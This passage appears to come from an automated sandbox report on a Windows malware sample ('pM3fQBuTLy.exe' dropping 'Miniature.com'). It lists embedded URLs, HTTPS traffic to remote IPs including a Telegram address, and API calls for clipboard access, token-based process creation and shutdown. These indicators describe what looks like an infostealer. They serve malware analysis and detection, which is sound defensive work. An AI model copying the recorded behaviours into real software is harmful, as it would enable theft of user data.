                Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.26.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                Source: Miniature.com, 00000010.00000002.2122589934.00000000001BD000.00000040.00001000.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2126388687.0000000004427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: pM3fQBuTLy.exeString found in binary or memory: https://www.digicert.com/CPS0
                Source: Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724742026.0000010400740000.00000004.00000800.00020000.00000000.sdmp, 5FCJE3.16.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000015.00000002.1724742026.0000010400740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/p
                Source: chrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: chrome.exe, 00000015.00000003.1678378459.00000104002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000015.00000003.1655875411.0000010400D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000015.00000002.1727123070.0000010400CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                Source: chrome.exe, 00000015.00000002.1725207665.000001040081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Chartk3
                Source: chrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000015.00000002.1728972505.00000104011C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: content_new.js.26.dr, content.js.26.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000015.00000002.1728069945.0000010400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725887499.0000010400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000015.00000002.1728069945.0000010400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725887499.0000010400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: chrome.exe, 00000015.00000002.1727705197.0000010400E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724193686.00000104005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000015.00000002.1723769051.0000010400438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000015.00000002.1726339262.0000010400A4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000015.00000002.1722378153.000001040001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722546758.000001040009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 00000015.00000002.1727547447.0000010400E18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000015.00000003.1699220213.0000010401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690468702.0000010401D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1693801169.0000010401C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1699459529.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1730972523.0000010401C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1704390408.0000010401D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690302224.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.office.com
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00C8F7C7
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,16_2_00C8F55C
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00CA9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00CA9FD2
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C84763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,16_2_00C84763
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,16_2_00C71B4D
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00C7F20D
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeFile created: C:\Windows\BwBroadcastingJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeFile created: C:\Windows\DenseCrisisJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C3801716_2_00C38017
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C1E1F016_2_00C1E1F0
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C2E14416_2_00C2E144
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C322A216_2_00C322A2
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C122AD16_2_00C122AD
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C4A26E16_2_00C4A26E
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C2C62416_2_00C2C624
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C9C8A416_2_00C9C8A4
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C4E87F16_2_00C4E87F
